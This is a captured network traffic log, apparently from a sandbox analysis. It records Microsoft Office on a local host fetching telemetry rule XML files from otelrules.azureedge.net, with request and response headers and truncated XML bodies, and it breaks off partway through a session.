                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:00:59 UTC | 468 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  122 | 192.168.2.4 | 49902 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:59 UTC | 192 | OUT | GET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 174
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                  ETag: "0x8DC582B91D80E15"
                                                                                                                  x-ms-request-id: c3d6966f-401e-0016-3ad8-2b53e0000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7f7scqbhC1DFW0m5w0000000kn000000000730u
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC | 174 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  123 | 192.168.2.4 | 49903 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:00:59 UTC | 192 | OUT | GET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1952
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                  ETag: "0x8DC582B956B0F3D"
                                                                                                                  x-ms-request-id: 05e9aefb-801e-00ac-4740-36fd65000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140059Z-16547b76f7fm7xw6hC1DFW5px40000000kk000000000g92h
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC | 1952 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  124 | 192.168.2.4 | 49904 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:00 UTC | 192 | OUT | GET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 958
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                  ETag: "0x8DC582BA0A31B3B"
                                                                                                                  x-ms-request-id: 8a5e2199-d01e-0014-3f2b-2ced58000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-16547b76f7fx6rhxhC1DFW76kg0000000km000000000kps2
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC | 958 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  125 | 192.168.2.4 | 49905 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:00 UTC | 192 | OUT | GET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC | 491 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 501
                                                                                                                  Connection: close
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                  ETag: "0x8DC582BACFDAACD"
                                                                                                                  x-ms-request-id: d4c521ce-601e-000d-6da3-342618000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-r178fb8d765d5f82hC1DFWsrm800000002s00000000094ch
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC | 501 | IN
                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  126 | 192.168.2.4 | 49906 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:00 UTC | 193 | OUT | GET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 2592
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                  ETag: "0x8DC582BB5B890DB"
                                                                                                                  x-ms-request-id: 1b1efdea-801e-00ac-68a8-34fd65000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-1749fc9bdbdlzhmchC1DFWe68s00000002dg00000000dtqc
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC | 2592 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  127 | 192.168.2.4 | 49909 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:00 UTC | 192 | OUT | GET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 3342
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                  ETag: "0x8DC582B927E47E9"
                                                                                                                  x-ms-request-id: 88f0b540-e01e-0033-5da0-344695000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-1749fc9bdbddrtrhhC1DFWsq8000000002q00000000099vu
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC | 3342 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  128 | 192.168.2.4 | 49910 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:00 UTC | 193 | OUT | GET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:00 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 2284
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                  ETag: "0x8DC582BCD58BEEE"
                                                                                                                  x-ms-request-id: 3863d8d3-f01e-0099-536f-359171000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-1749fc9bdbdwv5sghC1DFWwp6n00000002h0000000005t5f
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:00 UTC | 2284 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  129 | 192.168.2.4 | 49912 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:00 UTC | 192 | OUT | GET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1356
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                  ETag: "0x8DC582BDC681E17"
                                                                                                                  x-ms-request-id: 081c3a8e-a01e-0053-58d2-2c8603000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-16547b76f7fdtmzhhC1DFW6zhc00000007q0000000004ce9
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC | 1356 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  130 | 192.168.2.4 | 49911 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:00 UTC | 192 | OUT | GET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC | 494 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1393
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                  ETag: "0x8DC582BE3E55B6E"
                                                                                                                  x-ms-request-id: 0d0c2c5f-f01e-0020-0d06-36956b000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140100Z-1749fc9bdbd4dqj6hC1DFWr4n400000002k000000000eq0s
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC | 1393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  131 | 192.168.2.4 | 49913 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:01 UTC | 192 | OUT | GET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC | 517 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1393
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                  ETag: "0x8DC582BE39DFC9B"
                                                                                                                  x-ms-request-id: b1270df0-501e-0035-6dd2-2cc923000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-16547b76f7fr4g8xhC1DFW9cqc0000000hwg00000000cc91
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC | 1393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                  132 | 192.168.2.4 | 49915 | 13.107.246.45 | 443
                                                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                                                  2024-11-14 14:01:01 UTC | 192 | OUT | GET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC | 515 | IN | HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1356
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                  ETag: "0x8DC582BDF66E42D"
                                                                                                                  x-ms-request-id: f6edb455-601e-0002-0aa1-34a786000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-r178fb8d765tq2dphC1DFW278s00000002cg00000000f7yb
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC  1356               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  133         192.168.2.4  49916        13.107.246.45   443
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-11-14 14:01:01 UTC  192                OUT        GET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC  494                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1395
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                  ETag: "0x8DC582BE017CAD3"
                                                                                                                  x-ms-request-id: 5c63f72a-901e-0067-46a3-34b5cb000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-1749fc9bdbd9f5rdhC1DFWbers00000002n000000000ek7c
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC  1395               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  134         192.168.2.4  49918        13.107.246.45   443
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-11-14 14:01:01 UTC  192                OUT        GET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC  494                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1358
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                  ETag: "0x8DC582BE6431446"
                                                                                                                  x-ms-request-id: 791f132d-601e-003e-49a7-343248000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-r178fb8d765bflfthC1DFWuy9n00000002tg000000002avm
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC  1358               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  135         192.168.2.4  49919        13.107.246.45   443
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-11-14 14:01:01 UTC  192                OUT        GET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:01 UTC  517                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1395
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                  ETag: "0x8DC582BDE12A98D"
                                                                                                                  x-ms-request-id: 43524f19-601e-003e-07d2-2c3248000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140101Z-16547b76f7fcjqqhhC1DFWrrrc0000000ku00000000012es
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:01 UTC  1395               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisi


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  136         192.168.2.4  49920        13.107.246.45   443
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-11-14 14:01:02 UTC  192                OUT        GET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:02 UTC  517                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1358
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                  ETag: "0x8DC582BE022ECC5"
                                                                                                                  x-ms-request-id: 70b2909d-801e-00ac-33c1-2cfd65000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-16547b76f7f8dwtrhC1DFWd1zn0000000kv000000000ac7h
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:02 UTC  1358               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  137         192.168.2.4  49921        13.107.246.45   443
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-11-14 14:01:02 UTC  192                OUT        GET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:02 UTC  515                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1389
                                                                                                                  Connection: close
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                  ETag: "0x8DC582BE10A6BC1"
                                                                                                                  x-ms-request-id: f00fef9b-501e-0029-7e4b-36d0b8000000
                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                  x-azure-ref: 20241114T140102Z-r178fb8d765mr9nqhC1DFWs8m800000000v0000000009nuv
                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                  X-Cache: TCP_HIT
                                                                                                                  Accept-Ranges: bytes
                                                                                                                  2024-11-14 14:01:02 UTC  1389               IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                  Session ID  Source IP    Source Port  Destination IP  Destination Port
                                                                                                                  138         192.168.2.4  49923        13.107.246.45   443
                                                                                                                  Timestamp                Bytes transferred  Direction  Data
                                                                                                                  2024-11-14 14:01:02 UTC  192                OUT        GET /rules/rule700050v1s19.xml HTTP/1.1
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Accept-Encoding: gzip
                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                  2024-11-14 14:01:02 UTC  517                IN         HTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Content-Type: text/xml
                                                                                                                  Content-Length: 1352
                                                                                                                  Connection: close
